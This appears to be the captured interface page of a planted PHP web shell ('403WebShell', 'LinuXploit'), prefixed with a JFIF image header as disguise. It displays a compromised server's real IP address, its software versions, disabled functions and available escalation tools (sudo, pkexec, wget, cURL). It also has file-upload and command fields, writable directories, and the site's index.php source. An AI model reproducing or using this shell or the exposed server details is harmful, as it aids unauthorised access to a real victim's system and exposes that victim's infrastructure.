????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.net/ger/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.astacus.net/ger/index.php
<?php
	header("Cache-Control: no-cache, must-revalidate"); 
	session_start(); 
	
	if(isset($_SESSION['lang'])){
		// Do notning
	}else{
		$_SESSION['lang'] = "swe";
	}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
<?php
if($_SESSION['lang'] == "swe"){
	echo ("ASTACUS.SE - Fr&aring;n papper till dator...");
} else if ($_SESSION['lang'] == "eng"){
 	echo ("ASTACUS.SE - From paper to computer...");
} else {
	echo ("ASTACUS.SE - Von Papier bis Computer...");
}
?>

</title>
<link href="mainstyle.css" rel="stylesheet" type="text/css">
</head>

<body background="images/bg_45_line.gif">
<br>
<table width="793" height="227" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="793" height="95" valign="top" background="images/top793x95.gif">
	<?php 
			$page = $_SESSION['lang'] . '/meny.htm';
			include($page);
	?>
	
	</td>
  </tr>
  <tr>
    <td bgcolor="#FFFFFF">
	<?php	
		if($_GET["id"] == 2){
			$page = $_SESSION['lang'] . '/tjanster.htm';
			include($page);
		} else if($_GET["id"] == 3){
			$page = $_SESSION['lang'] . '/darfor.htm';
			include($page);
		} else if($_GET["id"] == 4){
			$page = $_SESSION['lang'] . '/process.htm';
			include($page);
		} else if($_GET["id"] == 5){
			$page = $_SESSION['lang'] . '/produkt.htm';
			include($page); 
		} else if($_GET["id"] == 6){
			$page = $_SESSION['lang'] . '/fragor.htm';
			include($page);
		} else if($_GET["id"] == 7){
			$page = $_SESSION['lang'] . '/kunder.htm';
			include($page);
		} else if($_GET["id"] == 8){
			$page = $_SESSION['lang'] . '/personal.htm';
			include($page);
		} else if($_GET["id"] == 9){
			$page = $_SESSION['lang'] . '/kontakt.htm';
			include($page);
		} else if($_GET["id"] == 10){
			$page = $_SESSION['lang'] . '/press.htm';
			include($page);
		} else if($_GET["id"] == 11){
			$page = $_SESSION['lang'] . '/om.htm';
			include($page);
		} else if($_GET["id"] == 12){
			$page = $_SESSION['lang'] . '/notiser.php';
			include($page);
		} else if($_GET["id"] == 13){
			$page = $_SESSION['lang'] . '/account.php';
			include($page);
		}else if($_GET["id"] == 14){
			$page = $_SESSION['lang'] . '/astacusproject.htm';
			include($page);
		} else{
			$page = $_SESSION['lang'] . '/start.php';
			include($page);
		}
		
		include("counterlog.php"); 
	?>
	  
	</td>
  </tr>
</table> 

<table width="793" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td bgcolor="#FFFFFF">&nbsp;</td>
  </tr>
  <tr>
    <td><form name="form1" method="post" action="http://astacus.visionproject.se/logon.do">
        <table width="793" height="93" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td background="images/bottom793x93.png">
			
				<?php 
				$page = $_SESSION['lang'] . '/bottom.php';
				include($page);
				?>	
			
			</td>
          </tr>
        </table>
    </form></td>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit